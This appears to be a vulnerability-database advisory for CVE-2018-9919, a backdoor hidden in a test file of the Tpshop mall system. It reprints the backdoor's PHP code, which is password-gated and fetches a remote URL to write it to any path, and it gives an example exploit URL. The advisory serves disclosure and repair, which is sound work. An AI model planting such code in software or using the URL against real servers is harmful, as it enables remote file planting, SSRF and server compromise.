Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugMy SeebugSSV:97261
HistoryMay 02, 2018 - 12:00 a.m.

Backdoor in Tpshop <= 2.0.8 (CVE-2018-9919)

2018-05-0200:00:00
My Seebug
www.seebug.org
52

0.007 Low

EPSS

Percentile

80.4%

JSON

Backdoor in Tpshop <= 2.0.8 (CVE-2018-9919)

The Tpshop open source mall system is a multi-merchant mode mall system developed by Shenzhen Leopard Network Co.,
Ltd.This system is based on the Thinkphp development framework.

Product Download: http://www.tp-shop.cn/Index/Index/download.html

Vulnerability Type:Web Backdoor

Attack Type : Web Backdoor

Vulnerability Description

Tpshop has a backdoor code in the
‘/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php’ that can be
used to download files to the other server and can also initiate attacks through SSRF vulnerabilities.

The vulnerability code:

    /vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php(Line 486 to 
499):
        $path = $_REQUEST['bddlj'];
        $fileUrl =$_REQUEST['down_url'];
        if(md5(md5($_REQUEST['jmmy'])) !== 'caae8ca617372b67363bd284e98430f2')
            return false;   
        $path = strtolower($path);
        if(strstr($path,'php')) return false;   
        $ch = curl_init($fileUrl);            
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_BINARYTRANSFER,1);
        $file = curl_exec ($ch);
        curl_close ($ch);                   
        $fp = fopen($path,'w');
        fwrite($fp, $file);
        fclose($fp);

Exploit

The attacker can exploit this vulnerability to attack the server and increase its privileges,Example: download
arbitrary files,scan network port,information detection,attack internal network vulnerable’s server.

http://target//vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php?bddlj=save_filename&down_url=download_url&jmmy=decryptpass

Versions

Tpshop <= 2.0.8

Impact

Web Backdoor in Tp-shop 2.0.5-2.0.8 version allow remote attackers to download arbitrary files,scan network
port,information detection,attack internal network vulnerable’s server,may even cause a remote command execution via
the url parameter。

Repairs

Delete Web Backdoor code.
(/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php(Line 486 to 499))

Credit

This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response
Technical Team/Coordination Center of China (CNCERT/CC)

Related

nvd 1
packetstorm 1
prion 1
cvelist 1
zdt 1
cve 1
nvd
nvd
CVE-2018-9919
2018-05-02 21:29:01
packetstorm
packetstorm
Tpshop 2.0.8 Arbitrary File Download / SSRF
2018-05-02 00:00:00
prion
prion
Command injection
2018-05-02 21:29:00
cvelist
cvelist
CVE-2018-9919
2018-05-02 21:00:00
zdt
zdt
Tpshop 2.0.8 Arbitrary File Download / SSRF Vulnerability
2018-05-02 00:00:00
cve
cve
CVE-2018-9919
2018-05-02 21:29:01

0.007 Low

EPSS

Percentile

80.4%

JSON
Related for SSV:97261
nvd1packetstorm1prion1cvelist1zdt1cve1